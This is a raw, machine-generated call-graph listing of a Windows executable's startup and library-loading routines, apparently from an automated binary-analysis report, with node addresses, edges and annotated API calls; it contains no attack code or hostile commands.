19121->19134 19135 7ff6aae4adfe 19136 7ff6aae4ae0d 19135->19136 19137 7ff6aae4ae17 19135->19137 19139 7ff6aae40338 LeaveCriticalSection 19136->19139 19344 7ff6aae4ad69 19347 7ff6aae35478 LeaveCriticalSection 19344->19347 19623 7ff6aae2a2db 19625 7ff6aae2a2e1 19623->19625 19624 7ff6aae2bd90 12 API calls 19626 7ff6aae2ab96 19624->19626 19625->19624 19625->19626 18887 7ff6aae2bae0 18888 7ff6aae2bb0e 18887->18888 18889 7ff6aae2baf5 18887->18889 18889->18888 18891 7ff6aae3d5fc 12 API calls 18889->18891 18890 7ff6aae2bb6e 18891->18890 19141 7ff6aae4abe3 19142 7ff6aae4abf3 19141->19142 19145 7ff6aae35478 LeaveCriticalSection 19142->19145 19442 7ff6aae2cb50 19443 7ff6aae2cb60 19442->19443 19459 7ff6aae39ba8 19443->19459 19445 7ff6aae2cb6c 19465 7ff6aae2ce48 19445->19465 19447 7ff6aae2d12c 7 API calls 19448 7ff6aae2cc05 19447->19448 19449 7ff6aae2cb84 _RTC_Initialize 19457 7ff6aae2cbd9 19449->19457 19470 7ff6aae2cff8 19449->19470 19451 7ff6aae2cb99 19473 7ff6aae39014 19451->19473 19457->19447 19458 7ff6aae2cbf5 19457->19458 19460 7ff6aae39bb9 19459->19460 19461 7ff6aae34f08 _get_daylight 11 API calls 19460->19461 19464 7ff6aae39bc1 19460->19464 19462 7ff6aae39bd0 19461->19462 19463 7ff6aae3a8e0 _invalid_parameter_noinfo 37 API calls 19462->19463 19463->19464 19464->19445 19466 7ff6aae2ce59 19465->19466 19469 7ff6aae2ce5e __scrt_release_startup_lock 19465->19469 19467 7ff6aae2d12c 7 API calls 19466->19467 19466->19469 19468 7ff6aae2ced2 19467->19468 19469->19449 19498 7ff6aae2cfbc 19470->19498 19472 7ff6aae2d001 19472->19451 19474 7ff6aae39034 19473->19474 19488 7ff6aae2cba5 19473->19488 19475 7ff6aae3903c 19474->19475 19476 7ff6aae39052 GetModuleFileNameW 19474->19476 19477 7ff6aae34f08 _get_daylight 11 API calls 19475->19477 19480 7ff6aae3907d 19476->19480 19478 7ff6aae39041 19477->19478 19479 7ff6aae3a8e0 _invalid_parameter_noinfo 37 API calls 19478->19479 19479->19488 19513 7ff6aae38fb4 19480->19513 19483 7ff6aae390c5 19484 7ff6aae34f08 _get_daylight 11 API calls 19483->19484 19485 7ff6aae390ca 19484->19485 19486 7ff6aae3a948 __free_lconv_mon 11 API calls 19485->19486 19486->19488 19487 7ff6aae390dd 19490 7ff6aae3912b 19487->19490 19491 7ff6aae39144 19487->19491 19496 7ff6aae390ff 19487->19496 19488->19457 19497 7ff6aae2d0cc InitializeSListHead 19488->19497 19489 7ff6aae3a948 __free_lconv_mon 11 API calls 19489->19488 19492 7ff6aae3a948 __free_lconv_mon 11 API calls 19490->19492 19494 7ff6aae3a948 __free_lconv_mon 11 API calls 19491->19494 19493 7ff6aae39134 19492->19493 19495 7ff6aae3a948 __free_lconv_mon 11 API calls 19493->19495 19494->19496 19495->19488 19496->19489 19499 7ff6aae2cfd6 19498->19499 19501 7ff6aae2cfcf 19498->19501 19502 7ff6aae3a1ec 19499->19502 19501->19472 19505 7ff6aae39e28 19502->19505 19512 7ff6aae402d8 EnterCriticalSection 19505->19512 19514 7ff6aae39004 19513->19514 19515 7ff6aae38fcc 19513->19515 19514->19483 19514->19487 19515->19514 19516 7ff6aae3eb98 _get_daylight 11 API calls 19515->19516 19517 7ff6aae38ffa 19516->19517 19518 7ff6aae3a948 __free_lconv_mon 11 API calls 19517->19518 19518->19514 19218 7ff6aae3afd0 19219 7ff6aae3afea 19218->19219 19220 7ff6aae3afd5 19218->19220 19224 7ff6aae3aff0 19220->19224 19225 7ff6aae3b03a 19224->19225 19226 7ff6aae3b032 19224->19226 19228 7ff6aae3a948 __free_lconv_mon 11 API calls 19225->19228 19227 7ff6aae3a948 __free_lconv_mon 11 API calls 19226->19227 19227->19225 19229 7ff6aae3b047 19228->19229 19230 7ff6aae3a948 __free_lconv_mon 11 API calls 19229->19230 19231 7ff6aae3b054 19230->19231 19232 7ff6aae3a948 __free_lconv_mon 11 API calls 19231->19232 19233 7ff6aae3b061 19232->19233 19234 7ff6aae3a948 __free_lconv_mon 11 API calls 19233->19234 19235 7ff6aae3b06e 19234->19235 19236 7ff6aae3a948 __free_lconv_mon 11 API calls 19235->19236 19237 7ff6aae3b07b 19236->19237 19238 7ff6aae3a948 __free_lconv_mon 11 API calls 19237->19238 19239 7ff6aae3b088 19238->19239 19240 7ff6aae3a948 __free_lconv_mon 11 API calls 19239->19240 19241 7ff6aae3b095 19240->19241 19242 7ff6aae3a948 __free_lconv_mon 11 API calls 19241->19242 19243 7ff6aae3b0a5 19242->19243 19244 7ff6aae3a948 __free_lconv_mon 11 API calls 19243->19244 19245 7ff6aae3b0b5 19244->19245 19250 7ff6aae3ae94 19245->19250 19264 7ff6aae402d8 EnterCriticalSection 19250->19264 19519 7ff6aae39d50 19522 7ff6aae39ccc 19519->19522 19529 7ff6aae402d8 EnterCriticalSection 19522->19529 16358 7ff6aae2cc3c 16379 7ff6aae2ce0c 16358->16379 16361 7ff6aae2cd88 16533 7ff6aae2d12c IsProcessorFeaturePresent 16361->16533 16362 7ff6aae2cc58 __scrt_acquire_startup_lock 16364 7ff6aae2cd92 16362->16364 16369 7ff6aae2cc76 __scrt_release_startup_lock 16362->16369 16365 7ff6aae2d12c 7 API calls 16364->16365 16367 7ff6aae2cd9d __FrameHandler3::FrameUnwindToEmptyState 16365->16367 16366 7ff6aae2cc9b 16368 7ff6aae2cd21 16385 7ff6aae2d274 16368->16385 16369->16366 16369->16368 16522 7ff6aae39b2c 16369->16522 16371 7ff6aae2cd26 16388 7ff6aae21000 16371->16388 16376 7ff6aae2cd49 16376->16367 16529 7ff6aae2cf90 16376->16529 16380 7ff6aae2ce14 16379->16380 16381 7ff6aae2ce20 __scrt_dllmain_crt_thread_attach 16380->16381 16382 7ff6aae2ce2d 16381->16382 16384 7ff6aae2cc50 16381->16384 16382->16384 16540 7ff6aae2d888 16382->16540 16384->16361 16384->16362 16386 7ff6aae4a4d0 memcpy_s 16385->16386 16387 7ff6aae2d28b GetStartupInfoW 16386->16387 16387->16371 16389 7ff6aae21009 16388->16389 16567 7ff6aae35484 16389->16567 16391 7ff6aae237fb 16574 7ff6aae236b0 16391->16574 16394 7ff6aae23808 __vcrt_freefls 16396 7ff6aae2c550 _log10_special 8 API calls 16394->16396 16400 7ff6aae23ca7 16396->16400 16398 7ff6aae2391b 16743 7ff6aae245c0 16398->16743 16399 7ff6aae2383c 16734 7ff6aae21c80 16399->16734 16527 7ff6aae2d2b8 GetModuleHandleW 16400->16527 16403 7ff6aae2385b 16646 7ff6aae28830 16403->16646 16406 7ff6aae2396a 16766 7ff6aae22710 16406->16766 16408 7ff6aae2388e 16417 7ff6aae238bb __vcrt_freefls 16408->16417 16738 7ff6aae289a0 16408->16738 16410 7ff6aae2395d 16411 7ff6aae23962 16410->16411 16412 7ff6aae23984 16410->16412 16762 7ff6aae3004c 16411->16762 16413 7ff6aae21c80 49 API calls 16412->16413 16416 7ff6aae239a3 16413->16416 16422 7ff6aae21950 115 API calls 16416->16422 16418 7ff6aae28830 14 API calls 16417->16418 16425 7ff6aae238de __vcrt_freefls 16417->16425 16418->16425 16420 7ff6aae23a0b 16421 7ff6aae289a0 40 API calls 16420->16421 16423 7ff6aae23a17 16421->16423 16424 7ff6aae239ce 16422->16424 16426 7ff6aae289a0 40 API calls 16423->16426 16424->16403 16427 7ff6aae239de 16424->16427 16431 7ff6aae2390e __vcrt_freefls 16425->16431 16777 7ff6aae28940 16425->16777 16428 7ff6aae23a23 16426->16428 16429 7ff6aae22710 54 API calls 16427->16429 16430 7ff6aae289a0 40 API calls 16428->16430 16429->16394 16430->16431 16432 7ff6aae28830 14 API calls 16431->16432 16433 7ff6aae23a3b 16432->16433 16434 7ff6aae23b2f 16433->16434 16435 7ff6aae23a60 __vcrt_freefls 16433->16435 16436 7ff6aae22710 54 API calls 16434->16436 16437 7ff6aae28940 40 API calls 16435->16437 16439 7ff6aae23aab 16435->16439 16436->16394 16437->16439 16438 7ff6aae28830 14 API calls 16440 7ff6aae23bf4 __vcrt_freefls 16438->16440 16439->16438 16441 7ff6aae23c46 16440->16441 16442 7ff6aae23d41 16440->16442 16444 7ff6aae23c50 16441->16444 16445 7ff6aae23cd4 16441->16445 16784 7ff6aae244e0 16442->16784 16659 7ff6aae290e0 16444->16659 16446 7ff6aae28830 14 API calls 16445->16446 16450 7ff6aae23ce0 16446->16450 16447 7ff6aae23d4f 16451 7ff6aae23d71 16447->16451 16452 7ff6aae23d65 16447->16452 16455 7ff6aae23ced 16450->16455 16463 7ff6aae23c61 16450->16463 16454 7ff6aae21c80 49 API calls 16451->16454 16787 7ff6aae24630 16452->16787 16464 7ff6aae23cc8 __vcrt_freefls 16454->16464 16458 7ff6aae21c80 49 API calls 16455->16458 16457 7ff6aae22710 54 API calls 16457->16394 16461 7ff6aae23d0b 16458->16461 16459 7ff6aae23dbc 16709 7ff6aae29390 16459->16709 16461->16464 16465 7ff6aae23d12 16461->16465 16463->16457 16464->16459 16466 7ff6aae23da7 LoadLibraryExW 16464->16466 16468 7ff6aae22710 54 API calls 16465->16468 16466->16459 16467 7ff6aae23dcf SetDllDirectoryW 16470 7ff6aae23e02 16467->16470 16511 7ff6aae23e52 16467->16511 16468->16394 16471 7ff6aae28830 14 API calls 16470->16471 16479 7ff6aae23e0e __vcrt_freefls 16471->16479 16472 7ff6aae24000 16473 7ff6aae2400a PostMessageW GetMessageW 16472->16473 16474 7ff6aae2402d 16472->16474 16473->16474 16864 7ff6aae23360 16474->16864 16475 7ff6aae23f13 16714 7ff6aae233c0 16475->16714 16482 7ff6aae23eea 16479->16482 16486 7ff6aae23e46 16479->16486 16485 7ff6aae28940 40 API calls 16482->16485 16485->16511 16486->16511 16790 7ff6aae26dc0 16486->16790 16491 7ff6aae26fc0 FreeLibrary 16494 7ff6aae24053 16491->16494 16499 7ff6aae23e79 16502 7ff6aae23e9a 16499->16502 16513 7ff6aae23e7d 16499->16513 16811 7ff6aae26e00 16499->16811 16502->16513 16830 7ff6aae271b0 16502->16830 16511->16472 16511->16475 16513->16511 16846 7ff6aae22a50 16513->16846 16523 7ff6aae39b64 16522->16523 16524 7ff6aae39b43 16522->16524 18828 7ff6aae3a3d8 16523->18828 16524->16368 16528 7ff6aae2d2c9 16527->16528 16528->16376 16531 7ff6aae2cfa1 16529->16531 16530 7ff6aae2cd60 16530->16366 16531->16530 16532 7ff6aae2d888 7 API calls 16531->16532 16532->16530 16534 7ff6aae2d152 memcpy_s __FrameHandler3::FrameUnwindToEmptyState 16533->16534 16535 7ff6aae2d171 RtlCaptureContext RtlLookupFunctionEntry 16534->16535 16536 7ff6aae2d1d6 memcpy_s 16535->16536 16537 7ff6aae2d19a RtlVirtualUnwind 16535->16537 16538 7ff6aae2d208 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16536->16538 16537->16536 16539 7ff6aae2d256 __FrameHandler3::FrameUnwindToEmptyState 16538->16539 16539->16364 16541 7ff6aae2d89a 16540->16541 16542 7ff6aae2d890 16540->16542 16541->16384 16546 7ff6aae2dc24 16542->16546 16547 7ff6aae2d895 16546->16547 16548 7ff6aae2dc33 16546->16548 16550 7ff6aae2dc90 16547->16550 16554 7ff6aae2de60 16548->16554 16551 7ff6aae2dcbb 16550->16551 16552 7ff6aae2dc9e DeleteCriticalSection 16551->16552 16553 7ff6aae2dcbf 16551->16553 16552->16551 16553->16541 16558 7ff6aae2dcc8 16554->16558 16559 7ff6aae2ddb2 TlsFree 16558->16559 16565 7ff6aae2dd0c __vcrt_FlsAlloc 16558->16565 16560 7ff6aae2dd3a LoadLibraryExW 16562 7ff6aae2ddd9 16560->16562 16563 7ff6aae2dd5b GetLastError 16560->16563 16561 7ff6aae2ddf9 GetProcAddress 16561->16559 16562->16561 16564 7ff6aae2ddf0 FreeLibrary 16562->16564 16563->16565 16564->16561 16565->16559 16565->16560 16565->16561 16566 7ff6aae2dd7d LoadLibraryExW 16565->16566 16566->16562 16566->16565 16568 7ff6aae3f480 16567->16568 16570 7ff6aae3f526 16568->16570 16571 7ff6aae3f4d3 16568->16571 16569 7ff6aae3a814 _invalid_parameter_noinfo 37 API calls 16573 7ff6aae3f4fc 16569->16573 16877 7ff6aae3f358 16570->16877 16571->16569 16573->16391 16885 7ff6aae2c850 16574->16885 16577 7ff6aae236eb GetLastError 16892 7ff6aae22c50 16577->16892 16578 7ff6aae23710 16887 7ff6aae29280 FindFirstFileExW 16578->16887 16582 7ff6aae2377d 16918 7ff6aae29440 16582->16918 16583 7ff6aae23723 16907 7ff6aae29300 CreateFileW 16583->16907 16585 7ff6aae2c550 _log10_special 8 API calls 16588 7ff6aae237b5 16585->16588 16587 7ff6aae2378b 16591 7ff6aae22810 49 API calls 16587->16591 16594 7ff6aae23706 16587->16594 16588->16394 16596 7ff6aae21950 16588->16596 16590 7ff6aae23734 16910 7ff6aae22810 16590->16910 16591->16594 16593 7ff6aae2374c __vcrt_FlsAlloc 16593->16582 16594->16585 16597 7ff6aae245c0 108 API calls 16596->16597 16598 7ff6aae21985 16597->16598 16599 7ff6aae21c43 16598->16599 16600 7ff6aae27f90 83 API calls 16598->16600 16601 7ff6aae2c550 _log10_special 8 API calls 16599->16601 16602 7ff6aae219cb 16600->16602 16603 7ff6aae21c5e 16601->16603 16645 7ff6aae21a03 16602->16645 17275 7ff6aae306d4 16602->17275 16603->16398 16603->16399 16605 7ff6aae3004c 74 API calls 16605->16599 16606 7ff6aae219e5 16607 7ff6aae219e9 16606->16607 16608 7ff6aae21a08 16606->16608 16609 7ff6aae34f08 _get_daylight 11 API calls 16607->16609 17279 7ff6aae3039c 16608->17279 16611 7ff6aae219ee 16609->16611 17282 7ff6aae22910 16611->17282 16614 7ff6aae21a26 16616 7ff6aae34f08 _get_daylight 11 API calls 16614->16616 16615 7ff6aae21a45 16619 7ff6aae21a7b 16615->16619 16620 7ff6aae21a5c 16615->16620 16617 7ff6aae21a2b 16616->16617 16618 7ff6aae22910 54 API calls 16617->16618 16618->16645 16622 7ff6aae21c80 49 API calls 16619->16622 16621 7ff6aae34f08 _get_daylight 11 API calls 16620->16621 16623 7ff6aae21a61 16621->16623 16624 7ff6aae21a92 16622->16624 16625 7ff6aae22910 54 API calls 16623->16625 16626 7ff6aae21c80 49 API calls 16624->16626 16625->16645 16627 7ff6aae21add 16626->16627 16628 7ff6aae306d4 73 API calls 16627->16628 16629 7ff6aae21b01 16628->16629 16630 7ff6aae21b16 16629->16630 16631 7ff6aae21b35 16629->16631 16632 7ff6aae34f08 _get_daylight 11 API calls 16630->16632 16633 7ff6aae3039c _fread_nolock 53 API calls 16631->16633 16634 7ff6aae21b1b 16632->16634 16635 7ff6aae21b4a 16633->16635 16636 7ff6aae22910 54 API calls 16634->16636 16637 7ff6aae21b6f 16635->16637 16638 7ff6aae21b50 16635->16638 16636->16645 17297 7ff6aae30110 16637->17297 16640 7ff6aae34f08 _get_daylight 11 API calls 16638->16640 16642 7ff6aae21b55 16640->16642 16643 7ff6aae22910 54 API calls 16642->16643 16643->16645 16644 7ff6aae22710 54 API calls 16644->16645 16645->16605 16647 7ff6aae2883a 16646->16647 16648 7ff6aae29390 2 API calls 16647->16648 16649 7ff6aae28859 GetEnvironmentVariableW 16648->16649 16650 7ff6aae28876 ExpandEnvironmentStringsW 16649->16650 16651 7ff6aae288c2 16649->16651 16650->16651 16652 7ff6aae28898 16650->16652 16653 7ff6aae2c550 _log10_special 8 API calls 16651->16653 16654 7ff6aae29440 2 API calls 16652->16654 16655 7ff6aae288d4 16653->16655 16656 7ff6aae288aa 16654->16656 16655->16408 16657 7ff6aae2c550 _log10_special 8 API calls 16656->16657 16658 7ff6aae288ba 16657->16658 16658->16408 16660 7ff6aae290f5 16659->16660 17515 7ff6aae28570 GetCurrentProcess OpenProcessToken 16660->17515 16663 7ff6aae28570 7 API calls 16664 7ff6aae29121 16663->16664 16665 7ff6aae2913a 16664->16665 16666 7ff6aae29154 16664->16666 16667 7ff6aae226b0 48 API calls 16665->16667 16668 7ff6aae226b0 48 API calls 16666->16668 16669 7ff6aae29152 16667->16669 16670 7ff6aae29167 LocalFree LocalFree 16668->16670 16669->16670 16671 7ff6aae29183 16670->16671 16674 7ff6aae2918f 16670->16674 17525 7ff6aae22b50 16671->17525 16673 7ff6aae2c550 _log10_special 8 API calls 16675 7ff6aae23c55 16673->16675 16674->16673 16675->16463 16676 7ff6aae28660 16675->16676 16677 7ff6aae28678 16676->16677 16678 7ff6aae2869c 16677->16678 16679 7ff6aae286fa GetTempPathW GetCurrentProcessId 16677->16679 16681 7ff6aae28830 14 API calls 16678->16681 17534 7ff6aae225c0 16679->17534 16682 7ff6aae286a8 16681->16682 17541 7ff6aae281d0 16682->17541 16687 7ff6aae286e8 __vcrt_freefls 16708 7ff6aae287d4 __vcrt_freefls 16687->16708 16688 7ff6aae28728 __vcrt_freefls 16696 7ff6aae28765 __vcrt_freefls 16688->16696 17538 7ff6aae38b68 16688->17538 16692 7ff6aae2c550 _log10_special 8 API calls 16695 7ff6aae23cbb 16692->16695 16693 7ff6aae286ce __vcrt_freefls 16693->16679 16697 7ff6aae286dc 16693->16697 16695->16463 16695->16464 16700 7ff6aae29390 2 API calls 16696->16700 16696->16708 16701 7ff6aae287b1 16700->16701 16702 7ff6aae287e9 16701->16702 16703 7ff6aae287b6 16701->16703 16705 7ff6aae38238 38 API calls 16702->16705 16704 7ff6aae29390 2 API calls 16703->16704 16706 7ff6aae287c6 16704->16706 16705->16708 16707 7ff6aae38238 38 API calls 16706->16707 16707->16708 16708->16692 16710 7ff6aae293b2 MultiByteToWideChar 16709->16710 16713 7ff6aae293d6 16709->16713 16712 7ff6aae293ec __vcrt_freefls 16710->16712 16710->16713 16711 7ff6aae293f3 MultiByteToWideChar 16711->16712 16712->16467 16713->16711 16713->16712 16720 7ff6aae233ce memcpy_s 16714->16720 16715 7ff6aae235c7 16716 7ff6aae2c550 _log10_special 8 API calls 16715->16716 16717 7ff6aae23664 16716->16717 16717->16394 16733 7ff6aae290c0 LocalFree 16717->16733 16719 7ff6aae21c80 49 API calls 16719->16720 16720->16715 16720->16719 16725 7ff6aae235c9 16720->16725 16726 7ff6aae22a50 54 API calls 16720->16726 16728 7ff6aae235e2 16720->16728 16731 7ff6aae235d0 16720->16731 17730 7ff6aae24560 16720->17730 17736 7ff6aae27e20 16720->17736 17747 7ff6aae21600 16720->17747 17795 7ff6aae27120 16720->17795 17799 7ff6aae24190 16720->17799 17843 7ff6aae24450 16720->17843 16722 7ff6aae22710 54 API calls 16722->16715 16727 7ff6aae22710 54 API calls 16725->16727 16726->16720 16727->16715 16728->16722 16732 7ff6aae22710 54 API calls 16731->16732 16732->16715 16735 7ff6aae21ca5 16734->16735 16736 7ff6aae34984 49 API calls 16735->16736 16737 7ff6aae21cc8 16736->16737 16737->16403 16739 7ff6aae29390 2 API calls 16738->16739 16740 7ff6aae289b4 16739->16740 16741 7ff6aae38238 38 API calls 16740->16741 16742 7ff6aae289c6 __vcrt_freefls 16741->16742 16742->16417 16744 7ff6aae245cc 16743->16744 16745 7ff6aae29390 2 API calls 16744->16745 16746 7ff6aae245f4 16745->16746 16747 7ff6aae29390 2 API calls 16746->16747 16748 7ff6aae24607 16747->16748 18016 7ff6aae35f94 16748->18016 16751 7ff6aae2c550 _log10_special 8 API calls 16752 7ff6aae2392b 16751->16752 16752->16406 16753 7ff6aae27f90 16752->16753 16754 7ff6aae27fb4 16753->16754 16755 7ff6aae306d4 73 API calls 16754->16755 16760 7ff6aae2808b __vcrt_freefls 16754->16760 16756 7ff6aae27fd0 16755->16756 16756->16760 18407 7ff6aae378c8 16756->18407 16758 7ff6aae306d4 73 API calls 16761 7ff6aae27fe5 16758->16761 16759 7ff6aae3039c _fread_nolock 53 API calls 16759->16761 16760->16410 16761->16758 16761->16759 16761->16760 16763 7ff6aae3007c 16762->16763 18422 7ff6aae2fe28 16763->18422 16765 7ff6aae30095 16765->16406 16767 7ff6aae2c850 16766->16767 16768 7ff6aae22734 GetCurrentProcessId 16767->16768 16769 7ff6aae21c80 49 API calls 16768->16769 16770 7ff6aae22787 16769->16770 16771 7ff6aae34984 49 API calls 16770->16771 16772 7ff6aae227cf 16771->16772 16773 7ff6aae22620 12 API calls 16772->16773 16774 7ff6aae227f1 16773->16774 16775 7ff6aae2c550 _log10_special 8 API calls 16774->16775 16776 7ff6aae22801 16775->16776 16776->16394 16778 7ff6aae29390 2 API calls 16777->16778 16779 7ff6aae2895c 16778->16779 16780 7ff6aae29390 2 API calls 16779->16780 16781 7ff6aae2896c 16780->16781 16782 7ff6aae38238 38 API calls 16781->16782 16783 7ff6aae2897a __vcrt_freefls 16782->16783 16783->16420 16785 7ff6aae21c80 49 API calls 16784->16785 16786 7ff6aae244fd 16785->16786 16786->16447 16788 7ff6aae21c80 49 API calls 16787->16788 16789 7ff6aae24660 16788->16789 16789->16464 16791 7ff6aae26dd5 16790->16791 16792 7ff6aae23e64 16791->16792 16793 7ff6aae34f08 _get_daylight 11 API calls 16791->16793 16796 7ff6aae27340 16792->16796 16794 7ff6aae26de2 16793->16794 16795 7ff6aae22910 54 API calls 16794->16795 16795->16792 18433 7ff6aae21470 16796->18433 16798 7ff6aae27368 16799 7ff6aae24630 49 API calls 16798->16799 16809 7ff6aae274b9 __vcrt_freefls 16798->16809 16800 7ff6aae2738a 16799->16800 16801 7ff6aae2738f 16800->16801 16802 7ff6aae24630 49 API calls 16800->16802 16803 7ff6aae22a50 54 API calls 16801->16803 16804 7ff6aae273ae 16802->16804 16803->16809 16804->16801 16805 7ff6aae24630 49 API calls 16804->16805 16806 7ff6aae273ca 16805->16806 16806->16801 16807 7ff6aae273d3 16806->16807 16808 7ff6aae22710 54 API calls 16807->16808 16810 7ff6aae27443 memcpy_s __vcrt_freefls 16807->16810 16808->16809 16809->16499 16810->16499 16822 7ff6aae26e1c 16811->16822 16812 7ff6aae2c550 _log10_special 8 API calls 16814 7ff6aae26f51 16812->16814 16813 7ff6aae21840 45 API calls 16813->16822 16814->16502 16815 7ff6aae26faa 16817 7ff6aae22710 54 API calls 16815->16817 16816 7ff6aae21c80 49 API calls 16816->16822 16827 7ff6aae26f3f 16817->16827 16818 7ff6aae26f97 16819 7ff6aae22710 54 API calls 16818->16819 16819->16827 16820 7ff6aae24560 10 API calls 16820->16822 16821 7ff6aae27e20 52 API calls 16821->16822 16822->16813 16822->16815 16822->16816 16822->16818 16822->16820 16822->16821 16823 7ff6aae22a50 54 API calls 16822->16823 16824 7ff6aae26f84 16822->16824 16826 7ff6aae21600 118 API calls 16822->16826 16822->16827 16828 7ff6aae26f6d 16822->16828 16823->16822 16825 7ff6aae22710 54 API calls 16824->16825 16825->16827 16826->16822 16827->16812 16829 7ff6aae22710 54 API calls 16828->16829 16829->16827 18463 7ff6aae28e80 16830->18463 16832 7ff6aae271c9 16833 7ff6aae28e80 3 API calls 16832->16833 16847 7ff6aae2c850 16846->16847 16848 7ff6aae22a74 GetCurrentProcessId 16847->16848 16849 7ff6aae21c80 49 API calls 16848->16849 16850 7ff6aae22ac7 16849->16850 16851 7ff6aae34984 49 API calls 16850->16851 16852 7ff6aae22b0f 16851->16852 18539 7ff6aae26360 16864->18539 16867 7ff6aae23399 16873 7ff6aae23670 16867->16873 16869 7ff6aae23381 16869->16867 18607 7ff6aae26050 16869->18607 16874 7ff6aae2367e 16873->16874 16875 7ff6aae2368f 16874->16875 18827 7ff6aae28e60 FreeLibrary 16874->18827 16875->16491 16884 7ff6aae3546c EnterCriticalSection 16877->16884 16886 7ff6aae236bc GetModuleFileNameW 16885->16886 16886->16577 16886->16578 16888 7ff6aae292d2 16887->16888 16889 7ff6aae292bf FindClose 16887->16889 16890 7ff6aae2c550 _log10_special 8 API calls 16888->16890 16889->16888 16891 7ff6aae2371a 16890->16891 16891->16582 16891->16583 16893 7ff6aae2c850 16892->16893 16894 7ff6aae22c70 GetCurrentProcessId 16893->16894 16923 7ff6aae226b0 16894->16923 16896 7ff6aae22cb9 16927 7ff6aae34bd8 16896->16927 16899 7ff6aae226b0 48 API calls 16900 7ff6aae22d34 FormatMessageW 16899->16900 16902 7ff6aae22d6d 16900->16902 16903 7ff6aae22d7f MessageBoxW 16900->16903 16904 7ff6aae226b0 48 API calls 16902->16904 16905 7ff6aae2c550 _log10_special 8 API calls 16903->16905 16904->16903 16906 7ff6aae22daf 16905->16906 16906->16594 16908 7ff6aae23730 16907->16908 16909 7ff6aae29340 GetFinalPathNameByHandleW CloseHandle 16907->16909 16908->16590 16908->16593 16909->16908 16911 7ff6aae22834 16910->16911 16912 7ff6aae226b0 48 API calls 16911->16912 16913 7ff6aae22887 16912->16913 16914 7ff6aae34bd8 48 API calls 16913->16914 16915 7ff6aae228d0 MessageBoxW 16914->16915 16916 7ff6aae2c550 _log10_special 8 API calls 16915->16916 16917 7ff6aae22900 16916->16917 16917->16594 16919 7ff6aae2946a WideCharToMultiByte 16918->16919 16920 7ff6aae29495 16918->16920 16919->16920 16922 7ff6aae294ab __vcrt_freefls 16919->16922 16921 7ff6aae294b2 WideCharToMultiByte 16920->16921 16920->16922 16921->16922 16922->16587 16924 7ff6aae226d5 16923->16924 16925 7ff6aae34bd8 48 API calls 16924->16925 16926 7ff6aae226f8 16925->16926 16926->16896 16929 7ff6aae34c32 16927->16929 16928 7ff6aae34c57 16930 7ff6aae3a814 _invalid_parameter_noinfo 37 API calls 16928->16930 16929->16928 16931 7ff6aae34c93 16929->16931 16933 7ff6aae34c81 16930->16933 16945 7ff6aae32f90 16931->16945 16935 7ff6aae2c550 _log10_special 8 API calls 16933->16935 16934 7ff6aae34d74 16936 7ff6aae3a948 __free_lconv_mon 11 API calls 16934->16936 16938 7ff6aae22d04 16935->16938 16936->16933 16938->16899 16939 7ff6aae34d49 16942 7ff6aae3a948 __free_lconv_mon 11 API calls 16939->16942 16940 7ff6aae34d9a 16940->16934 16941 7ff6aae34da4 16940->16941 16944 7ff6aae3a948 __free_lconv_mon 11 API calls 16941->16944 16942->16933 16943 7ff6aae34d40 16943->16934 16943->16939 16944->16933 16946 7ff6aae32fce 16945->16946 16947 7ff6aae32fbe 16945->16947 16948 7ff6aae32fd7 16946->16948 16954 7ff6aae33005 16946->16954 16949 7ff6aae3a814 _invalid_parameter_noinfo 37 API calls 16947->16949 16950 7ff6aae3a814 _invalid_parameter_noinfo 37 API calls 16948->16950 16951 7ff6aae32ffd 16949->16951 16950->16951 16951->16934 16951->16939 16951->16940 16951->16943 16954->16947 16954->16951 16956 7ff6aae339a4 16954->16956 16989 7ff6aae333f0 16954->16989 17026 7ff6aae32b80 16954->17026 16957 7ff6aae339e6 16956->16957 16958 7ff6aae33a57 16956->16958 16959 7ff6aae339ec 16957->16959 16960 7ff6aae33a81 16957->16960 16961 7ff6aae33a5c 16958->16961 16962 7ff6aae33ab0 16958->16962 16963 7ff6aae33a20 16959->16963 16964 7ff6aae339f1 16959->16964 17049 7ff6aae31d54 16960->17049 16965 7ff6aae33a91 16961->16965 16966 7ff6aae33a5e 16961->16966 16968 7ff6aae33ac7 16962->16968 16971 7ff6aae33aba 16962->16971 16972 7ff6aae33abf 16962->16972 16969 7ff6aae339f7 16963->16969 16963->16972 16964->16968 16964->16969 17056 7ff6aae31944 16965->17056 16970 7ff6aae33a00 16966->16970 16978 7ff6aae33a6d 16966->16978 17063 7ff6aae346ac 16968->17063 16969->16970 16976 7ff6aae33a32 16969->16976 16985 7ff6aae33a1b 16969->16985 16987 7ff6aae33af0 16970->16987 17029 7ff6aae34158 16970->17029 16971->16960 16971->16972 16972->16987 17067 7ff6aae32164 16972->17067 16976->16987 17039 7ff6aae34494 16976->17039 16978->16960 16979 7ff6aae33a72 16978->16979 16979->16987 17045 7ff6aae34558 16979->17045 16981 7ff6aae2c550 _log10_special 8 API calls 16983 7ff6aae33dea 16981->16983 16983->16954 16985->16987 16988 7ff6aae33cdc 16985->16988 17074 7ff6aae347c0 16985->17074 16987->16981 16988->16987 17080 7ff6aae3ea08 16988->17080 16990 7ff6aae333fe 16989->16990 16991 7ff6aae33414 16989->16991 16992 7ff6aae339e6 16990->16992 16993 7ff6aae33a57 16990->16993 16995 7ff6aae33454 16990->16995 16994 7ff6aae3a814 _invalid_parameter_noinfo 37 API calls 16991->16994 16991->16995 16996 7ff6aae339ec 16992->16996 16997 7ff6aae33a81 16992->16997 16998 7ff6aae33a5c 16993->16998 16999 7ff6aae33ab0 16993->16999 16994->16995 16995->16954 17000 7ff6aae33a20 16996->17000 17001 7ff6aae339f1 16996->17001 17004 7ff6aae31d54 38 API calls 16997->17004 17002 7ff6aae33a91 16998->17002 17003 7ff6aae33a5e 16998->17003 17005 7ff6aae33ac7 16999->17005 17008 7ff6aae33aba 16999->17008 17009 7ff6aae33abf 16999->17009 17006 7ff6aae339f7 17000->17006 17000->17009 17001->17005 17001->17006 17011 7ff6aae31944 38 API calls 17002->17011 17007 7ff6aae33a00 17003->17007 17015 7ff6aae33a6d 17003->17015 17022 7ff6aae33a1b 17004->17022 17010 7ff6aae346ac 45 API calls 17005->17010 17006->17007 17013 7ff6aae33a32 17006->17013 17006->17022 17012 7ff6aae34158 47 API calls 17007->17012 17024 7ff6aae33af0 17007->17024 17008->16997 17008->17009 17014 7ff6aae32164 38 API calls 17009->17014 17009->17024 17010->17022 17011->17022 17012->17022 17016 7ff6aae34494 46 API calls 17013->17016 17013->17024 17014->17022 17015->16997 17017 7ff6aae33a72 17015->17017 17016->17022 17019 7ff6aae34558 37 API calls 